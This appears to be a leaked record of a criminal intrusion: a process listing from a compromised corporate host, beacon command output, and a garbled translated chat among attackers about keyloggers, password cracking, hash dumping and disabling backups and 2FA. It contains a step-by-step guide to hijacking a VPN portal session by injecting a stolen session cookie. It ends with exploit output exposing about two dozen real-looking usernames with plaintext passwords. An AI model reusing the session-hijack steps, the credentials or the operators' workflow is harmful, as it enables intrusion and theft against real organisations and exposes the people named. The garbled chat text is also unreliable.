chrome.exe 31592 Console 4 295,264 K Unknown WATERWAY\blauer 1:50:34 N/A
chrome.exe 15200 Console 4 4,880 K Unknown WATERWAY\blauer 0:00:02 N/A
chrome.exe 15472 Console 4 285,180 K Unknown WATERWAY\blauer 0:36:05 N/A
chrome.exe 34372 Console 4 73,292 K Unknown WATERWAY\blauer 0:27:11 N/A
chrome.exe 27544 Console 4 11,916 K Unknown WATERWAY\blauer 0:05:17 N/A
chrome.exe 27724 Console 4 51,816 K Unknown WATERWAY\blauer 0:02:59 N/A
chrome.exe 22768 Console 4 57,248 K Unknown WATERWAY\blauer 0:00:39 N/A
chrome.exe 28912 Console 4 188,200 K Unknown WATERWAY\blauer 0:05:32 N/A
chrome.exe 23328 Console 4 20,800 K Unknown WATERWAY\blauer 0:00:10 N/A
chrome.exe 4036 Console 4 9,044 K Unknown WATERWAY\blauer 0:00:16 N/A
AppleMobileDeviceProcess.    41884 Console 4 7,832 K Unknown WATERWAY\blauer 0:03:21 N/A
3CXWin8Phone.exe 27692 Console 4 123,900 K Unknown WATERWAY\blauer 0:56:56 N/A
BASupSrvcCnfg.exe 7556 Console 4 12,876 K Unknown WATERWAY\blauer 0:32:23 N/A
acrotray.exe 16828 Console 4 4,468 K Unknown WATERWAY\blauer 0:00:01 N/A
Creative Cloud.exe 24288 Console 4 55,500 K Unknown WATERWAY\blauer 0:19:36 N/A
Adobe CEF Helper.exe 32184 Console 4 22,696 K Unknown WATERWAY\blauer 0:12:52 N/A
Adobe Desktop Service.exe 40852 Console 4 81,052 K Unknown WATERWAY\blauer 0:34:04 N/A
Adobe CEF Helper.exe 2428 Console 4 158,868 K Unknown WATERWAY\blauer 1:05:01 N/A
Creative Cloud Helper.exe 22332 Console 4 19,640 K Unknown WATERWAY\blauer 0:13:17 N/A
CCLibrary.exe 18324 Console 4 1,856 K Unknown WATERWAY\blauer 0:00:00 N/A
node.exe 35104 Console 4 36,032 K Unknown WATERWAY\blauer 0:14:20 N/A
conhost.exe 4460 Console 4 3,584 K Unknown WATERWAY\blauer 0:00:00 N/A
CoreSync.exe 16208 Console 4 28,528 K Unknown WATERWAY\blauer 0:36:28 N/A
ONENOTEM.EXE 37636 Console 4 1,900 K Unknown WATERWAY\blauer 0:00:00 N/A
AdobeNotificationClient.e 27620 Console 4 1,012 K Unknown WATERWAY\blauer 0:00:00 N/A
Adobe Installer.exe 31268 Console 4 5,620 K Unknown WATERWAY\blauer 0:00:00 N/A
Adobe CEF Helper.exe 28724 Console 4 26,872 K Unknown WATERWAY\blauer 0:12:56 N/A
RuntimeBroker.exe 25900 Console 4 9,472 K Unknown WATERWAY\blauer 0:00:00 N/A
ShellExperienceHost.exe 23944 Console 4 56,372 K Unknown WATERWAY\blauer 0:00:26 N/A
RuntimeBroker.exe 32588 Console 4 27,900 K Unknown WATERWAY\blauer 0:00:08 N/A
svchost.exe 9332 Console 4 18,424 K Unknown WATERWAY\blauer 0:00:19 N/A
YourPhoneServer.exe 31332 Console 4 22,240 K Unknown WATERWAY\blauer 0:00:22 N/A
SettingSyncHost.exe 39092 Console 4 10,788 K Unknown WATERWAY\blauer 0:00:01 N/A
WindowsInternal.composabl 15372 Console 4 17,568 K Unknown WATERWAY\blauer 0:00:23 N/A
Slack.exe 31904 Console 4 85,668 K Unknown WATERWAY\blauer 0:10:31 N/A
Slack.exe 41664 Console 4 100,124 K Unknown WATERWAY\blauer 0:03:43 N/A
Slack.exe 34496 Console 4 19,596 K Unknown WATERWAY\blauer 0:01:03 N/A
RuntimeBroker.exe 22304 Console 4 5,232 K Unknown WATERWAY\blauer 0:00:00 N/A
Slack.exe 10944 Console 4 8,624 K Unknown WATERWAY\blauer 0:00:01 N/A
Slack.exe 21904 Console 4 166,092 K Unknown WATERWAY\blauer 0:33:21 N/A
dllhost.exe 31708 Console 4 10,072 K Unknown WATERWAY\blauer 0:00:02 N/A
Slack.exe 23036 Console 4 47,640 K Unknown WATERWAY\blauer 0:02:37 N/A
Slack.exe 15912 Console 4 9,676 K Unknown WATERWAY\blauer 0:00:16 N/A
Video.UI.exe 32480 Console 4 524 K Unknown WATERWAY\blauer 0:00:00 N/A
RuntimeBroker.exe 7700 Console 4 6,620 K Unknown WATERWAY\blauer 0:00:00 N/A
svchost.exe 36648 Console 4 25,584 K Unknown WATERWAY\blauer 0:00:38 N/A
regsvr32.exe 19536 Services 0 12,424 K Unknown WATERWAY\mharper 0:00:22 N/A
Calculator.exe 3432 Console 4 4,500 K Unknown WATERWAY\blauer 0:00:21 N/A
adb.exe 12956 Console 4 5,676 K Unknown WATERWAY\blauer 0:00:07 N/A
smartscreen.exe 27256 Console 4 24,068 K Unknown WATERWAY\blauer 0:00:11 N/A
svchost.exe 44376 Console 4 6,056 K Unknown WATERWAY\blauer 0:00:00 N/A
NCentralRDViewer.exe 43768 Console 4 108 K Unknown WATERWAY\blauer 0:00:00 N/A
SpeechRuntime.exe 27836 Console 4 14,848 K Unknown WATERWAY\blauer 0:00:06 N/A
HelpPane.exe 29828 Console 4 9,456 K Unknown WATERWAY\blauer 0:00:01 N/A
CompPkgSrv.exe 45776 Console 4 4,968 K Unknown WATERWAY\blauer 0:00:00 N/A
Microsoft.Photos.exe 4336 Console 4 7,392 K Unknown WATERWAY\blauer 0:00:56 N/A
RuntimeBroker.exe 40692 Console 4 28,292 K Unknown WATERWAY\blauer 0:01:30 N/A
Adobe CEF Helper.exe 30716 Console 4 12,624 K Unknown WATERWAY\blauer 0:08:06 N/A
NCentralRDLdr.exe 23292 Console 4 10,436 K Unknown WATERWAY\blauer 0:00:00 N/A
NCentralRRDViewer.exe 22220 Console 4 22,680 K Unknown WATERWAY\blauer 0:00:15 N/A
Todo.exe 20876 Console 4 133,788 K Unknown WATERWAY\blauer 0:01:01 N/A
RuntimeBroker.exe 15216 Console 4 32,128 K Unknown WATERWAY\blauer 0:00:24 N/A
WmiPrvSE.exe 34888 Services 0 34,408 K Unknown NT AUTHORITY\NETWORK SERVICE 0:13:11 N/A
Ssms.exe 44328 Console 4 227,644 K Unknown WATERWAY\blauer 0:18:10 N/A
unsecapp.exe 30292 Console 4 13,208 K Unknown WATERWAY\blauer 0:01:29 N/A
FileCoAuth.exe 20264 Console 4 12,528 K Unknown WATERWAY\blauer 0:00:02 N/A
OUTLOOK.EXE 23344 Console 4 460,596 K Unknown WATERWAY\blauer 0:24:22 N/A
sppsvc.exe 40540 Services 0 11,892 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:17 N/A
ctfmon.exe 47224 Console 4 19,856 K Unknown WATERWAY\blauer 0:00:51 N/A
PeopleExperienceHost.exe 7072 Console 4 39,376 K Unknown WATERWAY\blauer 0:00:00 N/A
RuntimeBroker.exe 41112 Console 4 9,312 K Unknown WATERWAY\blauer 0:00:00 N/A
SystemSettingsBroker.exe 36768 Console 4 21,924 K Unknown WATERWAY\blauer 0:00:00 N/A
SystemSettings.exe 16544 Console 4 64,608 K Unknown WATERWAY\blauer 0:00:06 N/A
WinSCP.exe 34652 Console 4 39,512 K Unknown WATERWAY\blauer 0:01:14 N/A
Ssms.exe 50816 Console 4 169,672 K Unknown WATERWAY\blauer 0:00:57 N/A
explorer.exe 53264 Console 4 80,220 K Unknown WATERWAY\blauer 0:01:07 N/A
chrome.exe 37108 Console 4 154,368 K Unknown WATERWAY\blauer 0:01:33 N/A
chrome.exe 46140 Console 4 107,296 K Unknown WATERWAY\blauer 0:00:29 N/A
chrome.exe 43940 Console 4 35,532 K Unknown WATERWAY\blauer 0:00:00 N/A
YourPhone.exe 26416 Console 4 9,788 K Unknown WATERWAY\blauer 0:00:00 N/A
RuntimeBroker.exe 22076 Console 4 8,744 K Unknown WATERWAY\blauer 0:00:00 N/A
chrome.exe 19712 Console 4 66,772 K Unknown WATERWAY\blauer 0:00:13 N/A
chrome.exe 39172 Console 4 49,756 K Unknown WATERWAY\blauer 0:00:03 N/A
chrome.exe 30856 Console 4 61,040 K Unknown WATERWAY\blauer 0:00:07 N/A
emulator.exe 20016 Console 4 7,188 K Unknown WATERWAY\blauer 0:00:00 N/A
conhost.exe 54264 Console 4 5,460 K Unknown WATERWAY\blauer 0:00:00 N/A
qemu-system-x86_64.exe 49880 Console 4 1,016,956 K Unknown WATERWAY\blauer 0:37:15 N/A
cmd.exe 4 43928 Console 4 3,516 K Unknown WATERWAY\blauer 0:00:00 N/A
emulator64-crash-service.    40780 Console 4 9,740 K Unknown WATERWAY\blauer 0:00:00 N/A
audiodg.exe 42216 Services 0 16,752 K Unknown NT AUTHORITY\LOCAL SERVICE 0:02:41 N/A
devenv.exe 21888 Console 4 380,748 K Unknown WATERWAY\blauer 0:04:09 N/A
PerfWatson2.exe 15704 Console 4 44,628 K Unknown WATERWAY\blauer 0:00:03 N/A
Microsoft.ServiceHub.Cont 2708 Console 4 44,828 K Unknown WATERWAY\blauer 0:00:01 N/A
conhost.exe 55252 Console 4 5,488 K Unknown WATERWAY\blauer 0:00:00 N/A
ServiceHub.IdentityHost.e 16320 Console 4 53,324 K Unknown WATERWAY\blauer 0:00:03 N/A
conhost.exe 27172 Console 4 5,528 K Unknown WATERWAY\blauer 0:00:00 N/A
ServiceHub.ThreadedWaitDi 55052 Console 4 45,404 K Unknown WATERWAY\blauer 0:00:01 N/A
conhost.exe 28896 Console 4 5,504 K Unknown WATERWAY\blauer 0:00:00 N/A
Broker.exe 53112 Console 4 35,228 K Unknown WATERWAY\blauer 0:00:54 N/A
conhost.exe 50116 Console 4 5,504 K Unknown WATERWAY\blauer 0:00:00 N/A
ServiceHub.VSDetouredHost 31776 Console 4 51,816 K Unknown WATERWAY\blauer 0:00:03 N/A
conhost.exe 25996 Console 4 5,508 K Unknown WATERWAY\blauer 0:00:00 N/A
IDB.Local.exe 49208 Console 4 43,628 K Unknown WATERWAY\blauer 0:00:06 N/A
conhost.exe 42228 Console 4 5,512 K Unknown WATERWAY\blauer 0:00:00 N/A
ServiceHub.RoslynCodeAnal 46356 Console 4 74,132 K Unknown WATERWAY\blauer 0:00:08 N/A
conhost.exe 10928 Console 4 5,516 K Unknown WATERWAY\blauer 0:00:00 N/A
ServiceHub.SettingsHost.e 21260 Console 4 70,072 K Unknown WATERWAY\blauer 0:00:08 N/A
conhost.exe 23504 Console 4 5,504 K Unknown WATERWAY\blauer 0:00:00 N/A
ServiceHub.Host.CLR.x86.e 16312 Console 4 44,724 K Unknown WATERWAY\blauer 0:00:01 N/A
conhost.exe 46424 Console 4 5,524 K Unknown WATERWAY\blauer 0:00:00 N/A
powershell.exe 25052 Console 4 42,496 K Unknown WATERWAY\blauer 0:00:00 N/A
conhost.exe 36704 Console 4 5,568 K Unknown WATERWAY\blauer 0:00:00 N/A
powershell.exe 39464 Console 4 38,496 K Unknown WATERWAY\blauer 0:00:00 N/A
conhost.exe 42828 Console 4 5,548 K Unknown WATERWAY\blauer 0:00:00 N/A
ServiceHub.Host.CLR.x86.e 22680 Console 4 32,824 K Unknown WATERWAY\blauer 0:00:01 N/A
conhost.exe 52664 Console 4 5,520 K Unknown WATERWAY\blauer 0:00:00 N/A
chrome.exe 19972 Console 4 52,024 K Unknown WATERWAY\blauer 0:00:01 N/A
chrome.exe 41692 Console 4 32,116 K Unknown WATERWAY\blauer 0:00:00 N/A
Veeam.Backup.Manager.exe 9088 Services 0 63,532 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
conhost.exe 45996 Services 0 5,508 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
devenv.exe 49028 Console 4 254,220 K Unknown WATERWAY\blauer 0:02:49 N/A
PerfWatson2.exe 53460 Console 4 42,212 K Unknown WATERWAY\blauer 0:00:02 N/A
Microsoft.ServiceHub.Cont 12532 Console 4 41,724 K Unknown WATERWAY\blauer 0:00:01 N/A
conhost.exe 27588 Console 4 5,068 K Unknown WATERWAY\blauer 0:00:00 N/A
ServiceHub.IdentityHost.e 37332 Console 4 51,708 K Unknown WATERWAY\blauer 0:00:03 N/A
conhost.exe 22424 Console 4 5,088 K Unknown WATERWAY\blauer 0:00:00 N/A
ServiceHub.VSDetouredHost 20684 Console 4 46,500 K Unknown WATERWAY\blauer 0:00:02 N/A
conhost.exe 18008 Console 4 5,080 K Unknown WATERWAY\blauer 0:00:00 N/A
ServiceHub.SettingsHost.e 52704 Console 4 67,064 K Unknown WATERWAY\blauer 0:00:09 N/A
conhost.exe 20140 Console 4 5,100 K Unknown WATERWAY\blauer 0:00:00 N/A
ServiceHub.Host.CLR.x86.e 38728 Console 4 38,788 K Unknown WATERWAY\blauer 0:00:01 N/A
conhost.exe 21596 Console 4 5,088 K Unknown WATERWAY\blauer 0:00:00 N/A
node.exe 32416 Console 4 17,808 K Unknown WATERWAY\blauer 0:00:20 N/A
node.exe 3908 Console 4 12,988 K Unknown WATERWAY\blauer 0:00:00 N/A
conhost.exe 34072 Console 4 5,236 K Unknown WATERWAY\blauer 0:00:00 N/A
conhost.exe 3076 Console 4 5,192 K Unknown WATERWAY\blauer 0:00:00 N/A
node.exe 26828 Console 4 12,384 K Unknown WATERWAY\blauer 0:00:00 N/A
ServiceHub.RoslynCodeAnal 26300 Console 4 47,016 K Unknown WATERWAY\blauer 0:00:02 N/A
conhost.exe 9604 Console 4 5,088 K Unknown WATERWAY\blauer 0:00:00 N/A
Zoom.exe 38420 Console 4 39,900 K Unknown WATERWAY\blauer 0:00:02 N/A
chrome.exe 6204 Console 4 110,316 K Unknown WATERWAY\blauer 0:01:20 N/A
chrome.exe 16424 Console 4 75,636 K Unknown WATERWAY\blauer 0:01:17 N/A
chrome.exe 46452 Console 4 83,048 K Unknown WATERWAY\blauer 0:00:40 N/A
Acrobat.exe 21524 Console 4 65,508 K Unknown WATERWAY\blauer 0:00:06 N/A
Zoom.exe 28588 Console 4 47,484 K Unknown WATERWAY\blauer 0:00:02 N/A
chrome.exe 8984 Console 4 86,464 K Unknown WATERWAY\blauer 0:00:22 N/A
dllhost.exe 47920 Console 4 8,100 K Unknown WATERWAY\blauer 0:00:00 N/A
chrome.exe 52124 Console 4 73,676 K Unknown WATERWAY\blauer 0:00:18 N/A
chrome.exe 41936 Console 4 63,712 K Unknown WATERWAY\blauer 0:00:04 N/A
chrome.exe 33212 Console 4 216,916 K Unknown WATERWAY\blauer 0:04:37 N/A
chrome.exe 40412 Console 4 33,820 K Unknown WATERWAY\blauer 0:00:00 N/A
chrome.exe 40984 Console 4 44,148 K Unknown WATERWAY\blauer 0:00:00 N/A
chrome.exe 26948 Console 4 43,064 K Unknown WATERWAY\blauer 0:00:00 N/A
chrome.exe 33364 Console 4 47,340 K Unknown WATERWAY\blauer 0:00:01 N/A
chrome.exe 38164 Console 4 50,728 K Unknown WATERWAY\blauer 0:00:01 N/A
chrome.exe 51816 Console 4 47,136 K Unknown WATERWAY\blauer 0:00:04 N/A
chrome.exe 43836 Console 4 35,044 K Unknown WATERWAY\blauer 0:00:01 N/A
chrome.exe 10436 Console 4 34,308 K Unknown WATERWAY\blauer 0:00:01 N/A
chrome.exe 37792 Console 4 34,644 K Unknown WATERWAY\blauer 0:00:00 N/A
chrome.exe 7472 Console 4 39,116 K Unknown WATERWAY\blauer 0:00:02 N/A
chrome.exe 19540 Console 4 33,328 K Unknown WATERWAY\blauer 0:00:00 N/A
ONENOTE.EXE 25564 Console 4 153,504 K Unknown WATERWAY\blauer 0:00:08 N/A
chrome.exe 21624 Console 4 66,676 K Unknown WATERWAY\blauer 0:00:03 N/A
chrome.exe 50940 Console 4 73,456 K Unknown WATERWAY\blauer 0:00:11 N/A
chrome.exe 11836 Console 4 108,808 K Unknown WATERWAY\blauer 0:00:11 N/A
chrome.exe 54380 Console 4 51,232 K Unknown WATERWAY\blauer 0:00:00 N/A
svchost.exe 2308 Console 4 32,304 K Unknown WATERWAY\blauer 0:00:01 N/A
chrome.exe 55992 Console 4 269,452 K Unknown WATERWAY\blauer 0:00:29 N/A
svchost.exe 34868 Services 0 6,704 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 44168 Services 0 7,028 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
chrome.exe 53128 Console 4 89,820 K Unknown WATERWAY\blauer 0:00:07 N/A
chrome.exe 50200 Console 4 86,080 K Unknown WATERWAY\blauer 0:00:01 N/A
chrome.exe 55936 Console 4 167,528 K Unknown WATERWAY\blauer 0:00:06 N/A
TrustedInstaller.exe 55536 Services 0 7,016 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
TiWorker.exe 48204 Services 0 28,180 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
chrome.exe 23068 Console 4 22,080 K Unknown WATERWAY\blauer 0:00:00 N/A
chrome.exe 42260 Console 4 41,352 K Unknown WATERWAY\blauer 0:00:00 N/A
RuntimeBroker.exe 21768 Console 4 26,860 K Unknown WATERWAY\blauer 0:00:00 N/A
cmd.exe 9420 Services 0 4,360 K Unknown WATERWAY\mharper 0:00:00 N/A
conhost.exe 29152 Services 0 11,432 K Unknown WATERWAY\mharper 0:00:00 N/A
tasklist.exe 34544 Services 0 9,940 K Unknown WATERWAY\mharper 0:00:00 N/A
``Tasked beaconed tasklist / I'll double-check from the context? I tried it
``Tasked beacon to take screenshot
[+] host called home, sent: 199779 bytes
[-] screenshot from desktop 0 is empty ``and give a screenshot of his desktop just every time I do it randomly, and maybe there is a best practiceson I wrote when I looked so you weighed the same keylog? preferably not falling off)[ ](https://mediaeveryone.com/group/waterway-com?msg=ayxHgDJKv4nb9sdm4) and the process any?[ ](https://mediaeveryone.com/group/waterway-com?msg=NrNsCZgkh2skCJgQr) polzak contextI had a keylogger in `Rackspace` can you find anything here about the keylogger - on which processes and under which polzak to hang it correctly?i can't remember in whose work) the one in mine is in fact in another case (if you suddenly thought about mine) i saw exactly in someone's active keylogger in other kobs have you checked? keylogger session hangs why then i did not put keylogger (in the keylogger empty?[ ] (https://mediaeveryone.com/group/waterway-com?msg=psi8ispBmgEugAhA5) it has already appeared in the dialogue) i remember if you put the keylogger? scared me, however) i went to the Watchguard and there all is normal all is normal as i understand it on the site and not monitor their network ``Waterway Customer Service `` <CustomerService@waterway.com> ``sender who? just a general report came for all time-date 4-readdono not read?I did not understand the joke about the russians in the mail the links in the boxes met? all collected browsers passed and nowhere is `infosight.hpe.com or hpe.com` I did not find myself in the removed, I do not know how the colleague does not have a link in browsers?[ ](https://mediaeveryone.com/group/waterway-com?msg=KtNRtbz2vAivRZAHE) seems not. when the client creates folders in the programdata. I did not find any (`)
https://store.vmware.com/,https://store.vmware.com/store/,10/7/2019 12:44:17 PM,13214943857640860,mharper@waterway.com,1Vanilla2
````infosight.hpe.com or ``hpe.com'' link above look in browser histories ``Download the latest version of the HPE Nimble Storage Windows Toolkit (NWT) to install on your Windows host or Windows VM.
     Log into HPE InfoSight (https://infosight.hpe.com/). If you do not have a password, click New user? Enroll now.
    Click Resources > Software Downloads .
    In the Integration Kits pane, click Windows Toolkit.
    From the Windows Toolkit (NWT) page, click Software (64 bit) under Current Version.
    Note: For NimbleOS 3.4.0 and later, only a 64-bit package is available.
    Note: The Windows host must be on the same subnet as that of the array to be set up.
    Save the NWT installation package to your Windows host. The installation package has a name similar to Setup-NimbleNWT-x64.x.x.x.x.exe, where x64 is the supported microprocessor and x.x.x.x is the NWT version number.
    Download the latest HPE Nimble Storage Windows Toolkit Release Notes. Review the list of Windows Server hotfixes.
    Note: If you are installing HPE Nimble Storage Setup Manager alone, then no hotfixes are needed. However, the .NET framework requirements still apply. Hotfix requirements are mandatory for any Windows host in which the HPE Nimble Storage Connection Manager is used to connect to HPE Nimble Storage volumes.
\
``````
https://infosight.hpe.com/InfoSight/media/cms/active/public/pubs_Windows_Integration_Guide_NWT_5_0_0.whz/nbt1481004374959.html
``t the machine is empty?[ ](https://mediaeveryone.com/group/waterway-com?msg=KPT66hnHWB3eLD5A9) LEVASHENKO-PC: 192.168.0.22 mharper is there a separate letter or is there a crack?[ ](https://mediaeveryone.com/group/waterway-com?msg=k4A3sFeJeHsd3j3pQ) ?yup then they changed the18th year I specially went down to find something like that, I mean when the accesses were distributed the message was ancient did you try this message as a password?and from what date the message? do you have his car? and you on his mail? does not fit the account[ ](https://mediaeveryone.com/group/waterway-com?msg=fXqsXx4qGPyRbox7d) that is the pass to the system account?so you can work with it more quickly do you have a topic on the forum on backups? if not, i advise you, then nimbleda, right in one click the whole tachka deletion there? but that will put aside, it will come in handy then we need nimbled(yes8 not the server?[ ](https://mediaeveryone.com/group/waterway-com?msg=L8AyTRkJYFWbpwPjB) there's only 8 computers (total 8) it's a correspondence about nimbly and also tried all the passwords I know how many computers? and what's backups? also on bitdefender got there) here. see different ips) 209.222.97.50:10201 this is mine and I have no other.206....24[ ](https://mediaeveryone.com/channel/general?msg=9G9GPaySX5fNYHYD4) about itThat's what kind of a deed? What ip are you talking about) I have this deed for a long time, you gave it to me and asked me to write to you after setting up so you can make a snapshot and you can roll it back. Look even there is a softs kotryy you have not put) I have not configured access to your addy, I gave you ` own` I gave him to work with evo with a already configured vpnomvzaimno no, you what confuse that squeeze me) is myparu min@user3 you took? not me, mine `209.222.97.50:10101` who took my addy after # evo-com?and i don't get it give you a fresh build tulchyna then 20 mnahahaha second you don't have to go shashitvo first these copypastes devil's toy go all the buttons i need to write one option)can combine )@all i'm preparing you a guide to speed up work, you want to poke buttons in the tulch or copy from the guide?okily let someone tell you a few posts above on updating settings for someone who came to life)we still have 10 hours too early)ready to go to sleep now + we will have a general discussion on process optimization next week will be very busy, so I recommend you get some sleep this weekend if you need more than one, this is a separate special order1domain one, or will there be different?++understood? now everywhere use domain in https hosts (stager) ip domain you used to specify the domain in httpshosts in the settings koba little change all in the attention I have an announcement call everyone in the chatty cute sweetdalay i still in koba @user9 sit time why drag it out to replace there is nothing in google that sessions do not fly so if nothing in google, what do you say?why are you silent? I think nothing in google, but it does not fly there anything@user8 what's wrong with cobo? and herehttp://github.com/asciimoo/exrexhttps://www.passcape.com/password_recovery_maskхешкат can do this? https://github.com/hashcat/maskprocessorгугл no need to remind the fuckin' ping, then it's okay
if not - remind me) so check the method known@tl1
try to pass any session in agesk.com
i got nothing from last login, not from coba @user9
check how dirty is 1? i'm also in CRISPREGIONAL.ORG@user9? someone is not enough to get to ehiska than from putty to pull the cribs for #1-done-crispregional-org
in passing at #0-dead-waterway-com checked to see if they're up or not. The situation since yesterday hasn't changeddrawing adinfo from trusts in #corp-televisa-com-mx so who's doing what? Fuck, everyone had it, but it fell off at different intervals[ ](https://mediaeveryone.com/channel/general?msg=BW3aGy9eQmo2mnQxF) were only in one cob?[ ](https://mediaeveryone.com/channel/general?msg=BW3aGy9eQmo2mnQxF) I don't see it fixing[ ](https://mediaeveryone.com/channel/general?msg=uM3C6eJm8Go9riDeu) yes, but while I was helping the other one, it fell off.
you fixed it yourself and that's it[ ](https://mediaeveryone.com/channel/general?msg=uM3C6eJm8Go9riDeu) yes, user4 with it
2 no answer urgently plz, is it up and running? hello, some of the servers were restored in yesterday's
see what's up? hello everyone
https://ftuapps.dev/proxifier-standard-edition-3-42-x64-x86-keygen-portable/
``from the machines where you can not go dump the craps through cme how are you progressing? good morning thank you all good night)https://hackware.ru/?p=11287LM:NTLMт e in this format takes hash yes? good morning all good morning good morning from tulsa on vintagekennet, only those that gave out in confu now all the dekki are running through StartW?backup kei still do not work but they were sitting there on the three went to the pile did not go to the pile I marathoned ufnet, simantek not among this pooladonado look for a scan po simantek not say verify this four simantek is not included?min10bya access to the terminal under the usual users only the client with the backup code does not let you go when the update will then detect 4/23 I will update now toolzion to delka swore when you checked?there's symantec eldrointeD there are 8 credits with each one there's no backups when you enter with the backups there's no backups in your face backups codes are generated in тхта so there's a million problems I just told you about backups you can solve them yourself but it's not possible to load the backup code can be deleted and you don't have to do it now or later sessions will expire at the end you decide if it will be there, the most likely will be available backupsadapokpon the essence should not be 2fatak you'll be on the vpnom to delete the code in the client profile settings are not after that on the webmorda i will be thrown out so?i will log into the client i will generate a backup code i will look i am talking about logging in through the client vpn what are you talking about?) so it when you log in from the client will drop out in the browssee the main thing then delete them as an option it is to log in through the client vpngenerate you can put them in one account and connect through vpn instead of 2 look in the settings profile is backup copesvir not a big choice so if the session is active will not be palevoe in their bookmarks to log in?ok until the session fires) and around again startup again now disconnect the browser session stuhlaguu and that's it changed the webcom to portaldobbed the session in b64 replaced the value specify what you needsaml rename but the incognito is not created it must be created no?the swap item should be there you look in the console in another tab ("47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg=") here's the guide
Using a WEB browser to access

 - take the session from the script output, e.g. "47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg="
 - Open the browser in incognito mode, open the developer's console (js-console)
 - Encode ID of the session in base64
   >> btoa ("47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg=") [ENTER]
   "NDdaakZLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0="
 - type in URL https://target (redirects to https://target/cgi-bin/welcome)
 - go into the application/cookies in the console, add the cookie
   swap : NDdaakZLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0=
 - in your browser (where .../cgi-bin/welcome) change URL to https://target/cgi-bin/portal
 - Access the resource under the user's session
``and you open it again after each attempt - close it.``Do you do it first in incognito mode from an anonymous browser?)and the log files from the old vpn do not have it? we did not get it so you have to go in through a session but I think it's from 2phase you're an expert on them) for you vpn
[+] Leaking sessions to dump configuration.
      [+] Found: SessionID: 1jHJ05pyjLQw0GZvgyDhnE2jJwv0sFnc9toWZFFQpSM= userType: 1 userName: suanino Password: Hotshots23 Domain: L&M Domain
      [+] Found: SessionID: 2urLQzwRsyR8FeQ16VaeYISe9gx2GjzEsv72IJeAvgs= userType: 1 userName: rcarrington Password: Rlcbkjcngm987! Domain: L&M Domain
      [+] Found: SessionID: 79iXsjaZpFZpfHSj3Ij1jtx8nABpP8QVMWftVldHrMaw= userType: 1 userName: mlong Password: Joshua2013!!!!!!! Domain: L&M Domain
      [+] Found: SessionID: 8toG4Gmy3DmF9dC4SIG8xGNjILAsXynGs8QT1mr6tHU= userType: 1 userName: kurban Password: DeerHunter22! Domain: L&M Domain
      [+] Found: SessionID: 8z190N9G2yCG14bTKpo68J0XDqzOCwPh5mQCheC8DPw= userType: 1 userName: nfranklin Password: Sundae24!!! Domain: L&M Domain
      [+] Found: SessionID: 9dJs2tiaLfZpV0Ma7g79oY1aG4FvW79kZIkVJU7tnqQ= userType: 1 userName: tegan Password: Mylilbuddy1 Domain: L&M Domain
      [+] Found: SessionID: ANDOyUyyl83haHEqaDbW13thjxrxpXsySbIXwK0rcGw= userType: 1 userName: rcraighead Password: Afapek112819 Domain: L&M Domain
      [+] Found: SessionID: Di0eR39DlxGZqqkVMdkQ20bSKw4z2Uo2zHnxAQZrC0S4= userType: 1 userName: terriw Password: Merrow3s934 Domain: L&M Domain
      [+] Found: SessionID: GIzvltAkPe26aebMF4CtohrIBaJrtO7FLvYslvZE0Iw= userType: 1 userName: mwilson Password: RiverMae@11 Domain: L&M Domain
      [+] Found: SessionID: GJwdPkGWSom4T4JP1JPooIVCY5voOguyrBsZmjFUaeLtg= userType: 1 userName: kcarrington Password: G@lDR063r6 Domain: L&M Domain
      [+] Found: SessionID: InbYkxJ3mH25VGAHIQb01Iqsgiigau3AhN2G7XJprHQ= userType: 1 userName: ssimmons Password: Coffee123! Domain: L&M Domain
      [+] Found: SessionID: Kk4ZwUtcpCl7ozEkAKv001HZlGnPaaTlZLr6g3HJsRw= userType: 1 userName: hmckinney Password: Family2020! Domain: L&M Domain
      [+] Found: SessionID: MovBR6w0IEb3zi10yKeZEQAxhnX6FvffdnToB52EGlY= userType: 1 userName: Bjones Password: @pr!lSh0werz1997ch Domain: L&M Domain
      [+] Found: SessionID: NjNnAwqla1uOuTn1fn1fE3p5XNvQ5Ox9JXAICPmWv0PPUk= userType: 1 userName: sbushnoe Password: Winter2020! Domain: L&M Domain
      [+] Found: SessionID: R1n01UtSop80AzxWza6lGCvBgqhRUvWoaO37cF7wG7A= userType: 1 userName: bjohnson Password: Multigard!@#$ Domain: L&M Domain
      [+] Found: SessionID: WFv4gr1f2DaaoE5KVayg4otU6hdLdFqWXYm8EM60PrcE= userType: 1 userName: toutman Password: Lightning02 Domain: L&M Domain
      [+] Found: SessionID: WTxex4JI0WxT5BhqrexrtTTALLHvU5A2QYohVpxtvjs= userType: 1 userName: georgew Password: 195Deeznuts$ Domain: L&M Domain
      [+] Found: SessionID: XhI3mae1Lxc7KLkcqqTkfi1S7lp5nW911N72LTQom0Yc= userType: 1 userName: tshaw Password: lamTEN#5053 Domain: L&M Domain
      [+] Found: SessionID: YwTFCvcrti79HYq8DTV43VU5vhqHC4cNzcC86OLunyc= userType: 1 userName: rdake Password: Carsyn12345 Domain: L&M Domain
      [+] Found: SessionID: bKVOGsqTD6dIGUfLaLeoraJyswAbkDZftcVW5QeKsPY= userType: 1 userName: jzeman Password: Bluebird11 Domain: L&M Domain
      [+] Found: SessionID: cCMKVWpdz76nmwmUSFilNoqlHRLefonQH0llEt8T0G8= userType: 1 userName: moscar Password: $Shell123456789 Domain: L&M Domain
      [+] Found: SessionID: gamTBY5ApMu1IIyMn4x9VztNpfYws0p5fLOw2VejseY= userType: 1 userName: mgarrison Password: Roscoe1971! Domain: L&M Domain
      [+] Found: SessionID: h3nDgyEj7JDo8BaSNkaxJbgM80kv15xVXLqeobLWI0w= userType: 1 userName: lindab Password: Hobart528$20211 Domain: L&M Domain
